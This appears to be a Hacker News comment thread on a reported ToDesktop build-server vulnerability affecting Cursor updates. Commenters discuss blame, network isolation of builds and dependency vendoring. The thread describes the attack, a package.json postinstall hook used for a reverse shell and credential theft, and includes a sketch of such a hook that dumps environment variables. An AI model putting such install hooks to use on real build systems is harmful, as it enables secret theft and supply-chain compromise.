Any purported expert who uses software without considering its security is simply negligent. I'm not sure why people are trying to spin this to avoid placing the blame on the negligent programmer(s).
Weak programmers do this to defend the group making crap software. I agree that defaults should be secure, and maybe there should be a request limit on admin/full-access tokens - but then people will just create another token with full access and use it.
Then you should have to click a big red button labelled "Enable insecure mode".
Defaults should be secure. Kind of blows my mind people still don't get this.
I’ve seen devs deploy production software with the admin password being “password”. I don’t think you are listening when they are saying “they’ll build a better idiot”.
Right because nobody ever makes a mistake.
That's why we don't have seatbelts or safety harnesses or helmets or RCDs. There's always going to be an idiot that drives without a seatbelt, so why bother at all, right?
When you drive without a seatbelt, it only affects you.
If you drive in a way that affects the safety of others, there are generally consequences.
Oh they are. Just like mongo and others. It’s a deliberate decision to remove basic security features in order to get traction.
Remove as many hurdles as possible to increase adoption.
To be fair, Cursor does this quite handily also.
Should we outlaw C because it lets you dereference null pointers, too?
Erm yes! Even the White House has said that.
The only reason we didn't for so long was because we didn't have a viable alternative. Now we do, we should absolutely stop writing C.
The white house recently said a lot of things. But of all things, I don’t think they’re even qualified to have an opinion about software, or medical advice, or… well, anything that generally requires an expert.
I don't think Firebase is really at fault here—the major issue they highlighted is that the deployment pipeline uploaded the compiled artifact to a shared bucket from a container that the user controlled. This doesn't have anything to do with firebase—it would have been just as impactful if the container building the code uploaded it to S3 from the buildbot.
Agreed. I recently stumbled upon the fact that even Hacker News is using Firebase for exposing an API for articles. Caution should be taken when writing server-side software in general.
[flagged]
The problem is that if there is a security incident, basically nobody cares except for some of us here. Normal people just ignore it. Until that changes, nothing you do will change the situation.
I'm sorry, but when will we hold the writers of crappy code responsible for their own bad decisions? Let's start there.
I don't know but we're in a thread about Cursor... I don't think anyone is writing significantly better code using Cursor.
I always find it unbelievable how we NEVER hold developers accountable. Any "actual" engineer would be (at least the one signing off, but in software, developers never sign off on anything - and maybe that's the problem).
> update: cursor (one of the affected customers) is giving me 50k USD for my efforts.
Kudos to cursor for compensating here. They aren't necessarily obliged to do so, but doing so demonstrates some level of commitment to security and community.
"i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload"
Just want to make sure I understand this. They made a hello world app and submitted it to todesktop with a post install script that opened a reverse shell on the todesktop build machine? Maybe I missed it but that shouldn't be possible. Build machine shouldn't have outbound open internet access right?? Didn't see that explained clearly but maybe I'm missing something or misunderstanding.
In what world do you have a machine which downloads source code to build it, but doesn't have outbound internet access so it can't download source code or build dependencies?
Like, effectively the "build machine" here is a locked down docker container that runs "git clone && npm build", right? How do you do either of those activities without outbound network access?
And outbound network access is enough on its own to create a reverse shell, even without any open inbound ports.
The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.
It's common, doesn't mean it's secure. A lot of linux distros in their packaging will separate download (allows outbound to fetch dependencies), from build (no outside access).
Unfortunately, in some ecosystems, even downloading packages using the native package managers is unsafe because of postinstall scripts or equivalent.
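For anyone unfamiliar, the hook is just an entry in package.json that runs arbitrary shell commands at install time - a harmless sketch (the researcher's actual payload was a reverse shell; this one only dumps the environment):

    {
      "name": "innocent-looking-package",
      "version": "1.0.0",
      "scripts": {
        "postinstall": "node -e \"console.log(process.env)\""
      }
    }

Installing with --ignore-scripts (e.g. npm ci --ignore-scripts) is the blunt mitigation, at the cost of breaking packages that genuinely need their install step.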
Even if your builders are downloading dependencies on the fly, you can and should force that through an artifact repository (e.g. artifactory) you control. They shouldn't need arbitrary outbound Internet access. The builder needs a token injected with read-only pull permissions for a write-through cache and push permissions to the path it is currently building for. The only thing it needs to talk to is the artifactory instance.
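Concretely, that can be as small as an .npmrc baked into the builder image (the hostname, repo path and token variable are placeholders):

    registry=https://artifactory.example.com/artifactory/api/npm/npm-virtual/
    //artifactory.example.com/artifactory/api/npm/npm-virtual/:_authToken=${NPM_PULL_TOKEN}
    always-auth=true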
In a world with an internal proxy/mirror for dependencies and no internet access allowed by build systems.
Which is not the world we live in.
s/we/I/
[flagged]
If you don't network isolate your build tooling then how do you have any confidence that your inputs are what you believe them to be? I run my build tools in a network namespace with no connection to the outside world. The dependencies are whatever I explicitly checked into the repo or otherwise placed within the directory tree.
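On Linux that can be as simple as this (a sketch: it assumes unprivileged user namespaces are enabled and that dependencies were fetched or vendored in a separate, network-enabled step):

    # fetch/vendor dependencies while the network is still available
    npm ci
    # then run the actual build in a fresh network namespace with no interfaces
    unshare --net --map-root-user -- npm run build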
You don't have any confidence beyond what lockfiles give you (which is to say the npm postinstall scripts could be very impure, non-hermetic, and output random strings). But if you require users to vendor all their dependencies, fully isolate all network traffic during build, be perfectly pure and reproducible and hermetic, presumably use nix/bazel/etc... well, you won't have any users.
If you want a perfectly secure system with 0 users, it's pretty easy to build that.
> But if you require users
I'm not suggesting that a commercial service should require this. You asked "In what world do you have ..." and I'm pointing out that it's actually a fairly common practice. Particularly in any security conscious environment.
Anyone not doing it is cutting corners to save time, which to be clear isn't always a bad thing. There's nothing wrong if my small personal website doesn't have a network isolated fully reproducible build. On the other hand, any widely distributed binaries definitely should.
For example, I fully expect that my bank uses network isolated builds for their website. They are an absolutely massive target after all.
Most banks and larger enterprises do exactly this. Devs don't get to go out and pick random libraries without a code review, and then it's placed on a local repository.
There is just far too much insecure and typo-squatted malware out there to pull things off the internet raw.
Hell, even just an unrestricted internal proxy at least gives you visibility after the fact.
This is npm with all dependencies stored in a directory. Check them in. You do code review your dependencies right? Everywhere I’ve worked in the last 10 years has required this. There is no fetching of dependencies in builds. Granted, this is harder to pull off if your devs are developing on a totally different cpu architecture than production (fuck you apple).
There are plenty of worlds that take security more seriously and practice defense in depth. Your response could use a little less hubris and a more genuinely inquisitive tone. Looks like others have already chimed in here but to respond to your (what feels like sarcasm) questions:
- You can have a submission process that accepts a package or downloads dependencies, and then passes it to another machine that is on an isolated network for code execution / build which then returns the built package and logs to the network facing machine for consumption.
Now, sure, if your build machine is still exposing everything on it to the user-supplied code (instead of sandboxing the actual npm build/make/etc. command), you could insert malicious code that zips up the whole filesystem, env vars, etc. and exfiltrates them through your built app, in this case snagging the secrets.
I don't disagree that the secrets on the build machine were the big miss, but I also think designing the build system differently could have helped.
You have to meet your users where they are. Your users are not using nix and bazel, they're using npm and typescript.
If your users are using bazel, it's easy to separate "download" from "build", but if you're meeting your users over here where cows aren't spherical, you can't take security that seriously.
Security doesn't help if all your users leave.
The simple solution would be to check your node_modules folder into source control. Then your build machine wouldn't need to download anything from anywhere except your repository.
you use a language where you have all your deps local to the repo? ie go vendor?
you can always limit said network access to npm.
You can't since a large number of npm post-install scripts also make random arbitrary network calls.
This includes things like downloading pre-compiled binaries for the native architecture from random servers, or compiling them on the spot.
npm is really cool.
[flagged]
It's called air-gapping, and lots of adults do it.
Note that without a reverse shell you could still leak the secrets in the built artifact itself.
Isn't it really common for build machines to have outbound internet access? Millions of developers use GitHub Actions for building artifacts and the public runners definitely have outbound internet access
Indeed, you can punch out from an actions runner. Such a thing is probably against GitHub's ToS, but I've heard from my third cousin twice removed that his friend once ssh'ed out from an action to a bastion host, then used port forwarding to get herself a shell on the runner in order to debug a failing build.
> probably against GitHub's ToS, but
Why would running code on a github action runner that's built to run code be against ToS?
If it was, I'm sure they'd ban the marketplace extensions that make it absolutely trivial to do this: https://github.com/marketplace/actions/debugging-with-ssh
could have just used https://github.com/mxschmitt/action-tmate
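e.g. with something like this in the workflow (the tmate action is real; the surrounding steps are just an example):

    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@v4
          - run: npm ci && npm test
          # drops you into an interactive SSH/tmate session on the runner
          # if a previous step failed
          - uses: mxschmitt/action-tmate@v3
            if: ${{ failure() }}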
So this friend escaped from the ephemeral container VM into the build host which happened to have a private SSH on it that allowed it to connect to a bastion host to... go back to the build host and debug a failed build that should be self-contained inside the container VM which they already had access in the first place by the means of, you know, running a build on it? Interesting.
A few decades ago, it was also really common to smoke. Common != good, github actions isn't a true build tool, it's an arbitrary code runtime platform with a few triggers tied to your github.
It is, and regardless of a few other commenters saying or hinting that it isn't... it is. An air-gapped build machine wouldn't work for most software built today.
Strange. How do things like Nix work then? The nix builders are network isolated. Most (all?) Gentoo packages can also be built without network access. That seems like it should cover a decent proportion of modern software.
Instances where an air gapped build machine doesn't work are examples of developer laziness, not bothering to properly document dependencies.
Sounds like a problem with modern software build practices to me.
Ya too many people think it's a great idea to raw dog your ci/cd on the net and later get newspaper articles written about the data leak.
The number of packages that are malicious is high enough; then you have typo-squatted packages, and packages that get compromised at a later date. Being isolated from the net, with proper monitoring, gives a huge heads-up when your build system suddenly tries to contact some random site/IP.
People don't think it's a great idea. In general, its just too much additional work/process - for very little benefit.
You're far more likely to encounter a security issue from adding/upgrading a dependency than your build process requiring internet access.
I'm a huge fan of the writing style. it's like hacking gonzo, but with literally 0 fluff. amazing work and an absolute delight to read from beginning to end
[flagged]
Obnoxious is a bit harsh - I liked the feeling it gave to the article, found it very readable and I had no trouble discerning sentences, especially with how they were broken up into paragraphs.
" please do not harass these companies or make it seem like it's their fault, it's not. it's todesktop's fault if anything) "
I don't get it. Why would it be "todesktop's fault", when all the mentioned companies allowed to push updates?
I had these kinds of discussions with naive developers giving _full access_ to GitHub orgs to various 3rd party apps -- that's never right!
Yeah, it is their fault. I don't download "todesktop" (to-exploit), I download Cursor. Don't give 3rd parties push access to all your clients, that's crazy. How can this crappy startup build server sign a build for you? That's insane.
it blows me away that this is even a product. it's like a half day of dev time, and they don’t appear to have over-engineered it or even done basic things given the exploit here.
Software developers don't actually write software anymore, they glue together VC-funded security nightmares every 1-3 years, before moving on to the next thing. This goes on and on until society collapses under its own weight.
In my experience, blame for this basically never lies on grunt-level devs; it's EMs and CTOs/CIOs who insist on using third-party products for everything out of some misguided belief that it will save dev time and it's foolish to reinvent the wheel. (Of course, often figuring out how to integrate a third-party wheel, and maintain the integration, is predictably far more work for a worse result than making your own wheel in the first place, but I have often found it difficult to convince managers of this. In fairness, occasionally they're right and I'm wrong!)
With all due respect, a compile pipeline across Win, Mac, Linux, for different CPU architectures, making sure signing works for all, and that the Electron auto-updater works as expected is a nightmare. I have been there, and it’s not fun.
I somewhat enjoy the fact that every time this blog gets posted, half of the comments are about the cat and lack of capital letters.
> i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload
From ToDesktop incident report,
> This leak occurred because the build container had broader permissions than necessary, allowing a postinstall script in an application's package.json to retrieve Firebase credentials. We have since changed our architecture so that this can not happen again, see the "Infrastructure and tooling" and "Access control and authentication" sections above for more information about our fixes.
I'm curious to know what the trial and error here was to get their machine to spit out the build, or if it was done in one shot.
> please do not harass these companies or make it seem like it's their fault, it's not
It also is: they are responsible for which tech pieces they pick when constructing their own puzzle.
Love the blog aesthetic, and the same goes to all your friends (linked at the bottom).
The lack of capitalization made it difficult for me to quickly read sentences. I had to be much more intentional when scanning the text.
With the number of dependencies and dependency trees going multiple levels deep? Third-party risk is the largely unaddressed elephant in the room that companies don't care about.
I started to use:
- a paid operating system (RHEL) with a team of paid developers and maintainers verifying builds and dependencies.
- empty dependencies. Only what the core language provides.
It's not that great of a sacrifice. Like $20/mo for the OS. And like 2 days of dev work, which pays for itself in the long run by avoiding a mass of code you don't understand.
"the build container now has a privileged sidecar that does all of the signing, uploading and everything else instead of the main container with user code having that logic."
Does this info about the fix seem alarming to anyone else? It's not a full description, so maybe some important details are left out? My understanding is that containers are generally not considered a secure enough boundary. Companies such as AWS use micro VMs (Firecracker) for secure multi tenant container workloads.
Oof. I already have enough stress from my own auto-updating, single-file remote access tool I run on all of my computers, given that a small part of the custom OTA mechanism's security is by obscurity. It would make sleeping hard owning something as popular as this.
1. Build a rootkit into your product.
2. Release your product.
I’d like to see some thoughts on where we go from here. Is there a way we can keep end users protected even despite potential compromise of services like ToDesktop?
(eg: companies still hosting some kind of integrity checking service themselves and the download is verified against that… likely there’s smarter ideas)
The user experience of auto-update is great, but having a single fatal link in the chain seems worrying. Can we secure it better?
The first step I'd recommend is to not use Electron when building a native app.
Unfortunately it’s easy to overlook the SPoF. This will happen again and again. Cloudflare, I’m looking at you..
The cat is cute but I'd rather not have it running in front of the text while I'm trying to read and use my cursor.
I had to go back and enable JavaScript. Wow, is the goal to direct my attention away from reading the text?
Ironically, it actually helped me stay focused on the article. Kind of like a fidget toy. When part of my brain would get bored, I could just move the cat and satisfy that part of my brain while I keep reading.
I know that sounds kind of sad that my brain can't focus that well (and it is), but I appreciated the cat.
If one could click the cat to make it dead, that'd work for everyone?
I can't see the cat! I went back and it just isn't working for me. I'm sad, I like cats.
Here it is:
https://en.m.wikipedia.org/wiki/Neko_(software)
Ah, whimsy memories of running that on beige boxen of my youth.
Also remember a similar thing with some Lemmings randomly falling and walking around on windows.
Played way too long having them pile up and yank the window from under them.
Then just… put the cursor in the corner? The blog isn’t interactive or anything. I think the cat is cute.
Cats tend to do that.
There are plenty of other websites that don't do that. Perhaps one of those would work better for you?
As someone who already has trouble reading due to eye issues, the lack of capital letters made this infuriatingly difficult to read.
From the ToDesktop write-up:
Is there an easy way to validate the version of Cursor one is running against the updated version by checking a hash or the like? I guess what I'm surprised at here is that a popular IDE would be delivered over a delivery platform like this (immature or not).
I would've expected IDE developers to "roll their own"
tbh if i had one wish i would love to see how five eyes get root level access to every device. seems like an insane amount of data
So TL;DR the vuln here is that ToDesktop injected production secrets in the container they use to build customer-supplied images.
This is completely incompetent to the point of gross negligence. There is no excuse for this
The JavaScript world has a culture of lots of small dependencies that end up becoming a huge tree no one could reasonably vendor or audit changes for. Worse, these small dependencies churn much faster than those of other languages.
With that culture supply chain attacks and this kind of vulnerability will keep happening a lot.
You want few dependencies, you want them to be widely used and you want them to be stable. Pulling in a tree of modules to check if something is odd or even isn't a good idea.
> security incidents happen all the time
Do they have to?
Isn't this notion making developers sloppy?
Yes.
As usual, I read the comments here first. I'm glad I read the article though because the comments here have pretty much nothing to do with the vulnerability. Here's a summary because the article actually jumps over explaining the vulnerability in the gap between two paragraphs:
This service is a kind of "app store" for JS applications installed on desktop machines. Their service hosts download assets, with a small installer/updater application running on the users' desktop that pulls from the download assets.
The vulnerability worked like this: the way application publishers interact with the service is to hand it a typical JS application source code repo, which the service builds, in a container in typical CI fashion. Therefore the app publisher has complete control over the build environment.
Meanwhile, the service performs security-critical operations inside that same container, using credentials from the container image. Furthermore, the key material used to perform these operations is valid for all applications, not just the one being built.
These two properties of the system: 1. build system trusts the application publisher (typical, not too surprising) and 2. build environment holds secrets that allow compromise of the entire system (not typical, very surprising), over all publishers not just the current one, allow a malicious app publisher to subvert other publishers' applications.
My goodness. So much third-party risk upon risk and lots of external services opening up this massive attack surface and introducing this RCE vulnerability.
From an Electron bundler service, to sourcemap extraction and now an exposed package.json with the container keys to deploy any app update to anyone's machine.
This isn't the only one, the other day Claude CLI got a full source code leak via the same method from its sourcemaps being exposed.
But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.
The issue here is not sourcemaps being available. The issue is admin credentials being shipped to clients for no reason.
Blaming Js/Ts is ridiculous. All those same problems exist in all environments. Js/Ts is the biggest so it gets the most attention but if you think it's different in any other environment you're fooling yourself.
Ecosystem, not the lang itself.
It truly is a community issue, it's not a matter of the lang.
You will never live down fucking left-pad
[flagged]
> But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.
You've always been able to do the first thing though: the only thing you can do is obfuscate the source map, but it's not like that's a substantial slowdown when you're hunting for authentication points (identify API URLs, work backwards).
And things like credentials in package.json are just a sickness which is global to computing right now: we have so many ways you can deploy credentials, basically zero common APIs which aren't globals (files or API keys), and even fewer security tools which acknowledge the real danger (protecting me from my computer's system files is far less valuable than protecting me from code pretending to be me as my own user - where all the real valuable data already is).
Basically I'm not convinced our security model has ever truly evolved beyond the 1970s, where the danger was "you damage the expensive computer" rather than "the data on the computer is worth orders of magnitude more than the computer".
This website loads extremely fast wow
Serving HTML is actually really fast if you don't bolt 17 layers of JavaScript on top of it first.
I'm shocked at how insecure most software is these days. Probably 90% of software built by startups has a critical vulnerability. It seems to keep getting worse year on year. Before, you used to have to have deep systems knowledge to trigger buffer overflows. It was more difficult to find exploits. Nowadays, you just need basic understanding of some common tools, protocols and languages like Firebase, GraphQL, HTTP, JavaScript. Modern software is needlessly complicated and this opens up a lot of opportunities.
> [please don't] make it seem like it's their fault, it's not. it's todesktop's fault if anything
What?! It's not some kind of joke. This could _already_ literally kill people, steal money and ruin lives.
It isn't even an option for any app owner/author to avoid taking responsibility for the decisions which determine the security and safety of users.
It's as simple as this: no safety record for the 3rd party - no trust, for sure. No security audit - no trust. No transparency in the audit - no trust.
Failing to make the right decision does not exempt you from liability, and should not.
Is it a kindergarten with an "it's not me, it's them" play? It does not matter who failed; the money could already have been stolen from random users (who just installed an app wrapped with this todesktop installer), and journalists could have been tracked and probably already killed in some dictatorship or conflict.
Bad decisions do not always make a bad owner.
But don't take it lightly, and don't advocate (for those who just paid you some money) "oh, they are innocent". As they are not. Be a grown-up, please, and let's make this world better together.
Bit breathless. How could this kill people?
The problem is that this entire sclerotic industry is so allergic to accountability, that, if you want people to start, you probably have to fire 90% of the workforce. If it were up to me, the developers responsible for this would never write software "professionally" again.
The industry (or a couple of generations currently inhabiting it) could start with at least accepting responsibility when something goes wrong. Let me be clear: it's not about ending the "blameless culture" in engineering. No. It's about ending the culture of not taking any responsibility at all, when things go south. See the difference.
"range of hundreds of millions of people in tech environments, other hackers, programmers, executives, etc. making this exploit deadly if used."
Bit too hyperbolic or whatever... Otherwise thrilling read!
[flagged]
Automatic update without some manual step by a user means that the devs have RCE on your machine.
I made Signal fix this, but most apps consider it working as intended. We learned nothing from Solarwinds.
> security incidents happen all the time, its natural. what matters is the company's response, and todesktop's response has been awesome, they were very nice to work with.
This was an excellent conclusion for the article.
[dead]
[flagged]
Why does it use Neko the cursor chasing cat? Why the goth color scheme? These are stylistic choices, there is no explaining them.
Thankfully there is reader mode. That dumb cat is so obnoxious on mobile.
woah, the cat chases your taps on mobile!
it’s a blog. people regularly use their personal sites to write in a tone and format that they are fond of. i only normally feel like i see this style from people who were on the internet in the 90s. i’d imagine we would see it even more if phones and auto correct didn’t enforce a specific style. imagine being a slave to the shift key. it can’t even fight back! i’m more upset the urls aren’t actually clickable links.
Finding an RCE for every computer running cursor is cool, and typing in all lowercase isn’t that cool. Finding an RCE on millions of computers has much much higher thermal mass than typing quirks, so the blog post makes typing in all lowercase cool.
why do the stars shine? why does rain fall from the sky? using upper case is just a social convention - throw off your chains.
the cat chase cursor thing is great
its cool. not everything has to be typed in a "normal" way.
just the style of their blog
ToDesktop vulnerability: not surprised. Trust broken.
Question/idea: can't GitHub use LLMs to periodically scan the code for vulnerabilities like this and inform the repo owner?
They can even charge for it ;)
You mean like this, but worse?
https://docs.github.com/en/code-security/code-scanning/intro...
Problem: a tool built with LLMs for building LLMs with LLMs has a vuln
Solution: more LLMs
Snap out of it
So you're saying one more LLM?
[flagged]
I can't post things like "what a bunch of clowns" due to hacker news guidelines so let me go by another more productive route.
These people, the ones who install dependencies (that install dependencies)+, these people who write apps with AI, who in the previous season looped between executing their code and searching the error on stackoverflow.
Whether they work for a company or have their own startup, the moment that they start charging money, they need to be held liable when shit happens.
When they make it their business model or employability advantage to take free code on the internet, add pumpkin spice and charge cash for it, they cross the line from pissing off passionate hackers by defiling our craft, to dumping in the pool and ruining it for users and us.
It is not sufficient to write somewhere in a contract that something is as is and we hold harmless and this and that. Buddy if you download an ai tool to write an ai tool to write an ai tool and you decided to slap a password in there, you are playing with big guns, if it gets leaked, you are putting other services at risk, but let's call that a misdemeanor. Because we need to reserve something stronger for when your program fails silently, and someone paid you for it, and they relied on your program, and acted on it.
That's worse than a vulnerability, there is no shared responsibility, at least with a vuln, you can argue that it wasn't all your fault, someone else actively caused harm. Now are we to believe the greater risk of installing 19k dependencies and programming ai with ai is vulns? No! We have a certainty, not a risk, that they will fuck it up.
Eventually we should license the field, but for now, we gotta hold devs liable.
Give those of us who do 10 times less, but do it right, some kind of marketing advantages, it shouldn't be legal that they are competing with us. A vscode fork got how much in VC funding?
My brothers, let's take up arms and defend. And defend quality software, I say. Fear not writing code, fear not writing raw html, fear not, for they don't feel fear, so why should you?
https://civboot.org
Join me my brother or sister
[flagged]